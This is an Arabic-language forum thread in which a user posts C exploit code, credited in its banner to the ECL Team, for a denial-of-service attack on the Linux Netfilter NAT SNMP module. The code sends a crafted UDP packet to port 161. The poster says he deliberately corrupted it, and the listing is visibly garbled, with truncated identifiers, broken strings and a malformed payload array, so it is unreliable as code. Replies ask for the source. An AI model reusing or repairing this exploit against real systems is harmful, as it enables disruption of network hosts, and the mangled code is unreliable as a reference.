إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

ثغرة امنيه بالغه الخطورة Snmp

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • ثغرة امنيه بالغه الخطورة Snmp

    بسم الله الرحمن الرحيم
    ***********************************************
    السلام عليكم ورحمه الله وبركاته.
    ثغرة امنيه بالغه الخطورة في أنظمة لينكس وبالتحديد في بروتوكول SNMP
    الاصدارات المصابة Linux Kernel 2.6.16.18 وماقبل
    (((تم تخريب الكود حفظ على اخونا المسلمين)))
    (((على فكره مش انا الى عامل الكود)))
    كود الاستغلال:
    #ifndef _BSD_SOURCE
    #define _BSD_SOURCE
    #endif
    #e.h>
    #include <libnet.h>

    void banner();
    void usage(char *);

    char pwnage[] = "\x30\x0a\x\x45\x43\x4c\xa4\x00";

    int rgc, char **argv)
    {
    char errbBUF_SIZE];
    libnet_t *l;
    int c;
    u_char *buf;
    int packet_len = 0;
    s;
    struct udphdr *UDP;
    u_int32_t src = 0, dst = 0;


    banner();

    if (argc < 3) usage(argv[0]);

    if ((l = libnet_init, NULL, errbuf)) == NULL) {
    fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
    exit(-1);
    }

    if ((src = argv[1], LIBNET_RESOLVE)) == -1) {
    fprintf(stderr, "[!ress.\n");
    exit(-1);
    }
    if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
    fprintf(stderr, "[!] tination address.\n");
    exit(-1);
    }

    if ((buf = malloc(IP_MAXPACKET)) == NULL) {
    perror(";
    exit(-1);
    }

    UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);

    packet_len = LIBNET_IPNET_UDP_H + sizeof(pwnage) - 1;

    srand(time(NULL));
    IP = (struct ip *) buf;
    IP-* version 4 */
    IP->ip_hl = 5; /* header length */
    IP->ip_tos = 0; /* IP tos */
    IP->ip_len = htons(packet_len); /* total length */
    IP->ipd(); /* IP ID */
    IP->ip_off = htons(0); /* fragmentation flags */
    IP->ip_t /* time to live */
    IP->ip_p = IPPROTO_UDP; /t protocol */
    IP->ip_sum = 0;
    IP->ip_src.s_addr = src;
    IP->ip_dst.s_addr = dst;

    UDsport = rand();
    UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
    UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
    Uh_sum = 0;

    memcpy(buf + LIBNET_IPV4_HBNET_UDP_H, pwnage, sizeof(pwnage) - 1);

    libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packe LIBNET_IPV4_H);

    if ((c = libnet_aw_ipv4(l, buf, packet_len)) == -1)
    {
    fprintf(stderr, "[!] rror: %s\n", libnet_geterror(l));
    exit(-1);
    }

    printf("acket sent.\n");

    libestroy(l);
    free(buf);
    return (0);
    }

    void usage(char *cmd)
    {
    printf("[!] Usage: %s <source>ination> [port]\n", cmd);
    exit(-1);
    }

    void banner()
    {
    printf("\t\tNetfilter NAT SP module DoS exploit\n"
    "\t\t Yuri Gushin <[email protected]>\n"
    "\t\t Alex Behar <[email protected]>\n"
    "\t\t\t ECL Team\n\n\n");
    }// m [ 05/06/2006 ]
    التعديل الأخير تم بواسطة lafta2; الساعة 17-03-2007, 05:38 AM.
    http://img140.imageshack.us/img140/3512/47662796aw2.gif
    لاتنسونا من الدعاء
    لا اله الا الله محمد رسول الله
    (((تركت فيكم ما ان تمسكتم به لن تضلو ا بعدى ابدا كتاب الله وسنتى)))
    www.lafta2abdallah.jeeran.com (((موقع اسلامى)))
    اذا تريد ان تاخذ حسنات اذهب الى الموقع وانسخ اى موضوع وضعه فى اى منتدى
    (((وبذلك تعم الفائد__موقع مفتوح للمسلمين)))
    " الا رسول الله "صلى الله عليه وسلم"
    قاطعو المنتجات الدنماركيه

  • #2
    المصدر لا هنت

    وكمان لو نسقت الكود كان افضل

    تعليق


    • #3
      ممكن المصدر أخي الكريم ؟؟
      لا تصطد لي سمكة ، بل علمني كيف اصطاد سمكة :wink:

      تعليق

      يعمل...
      X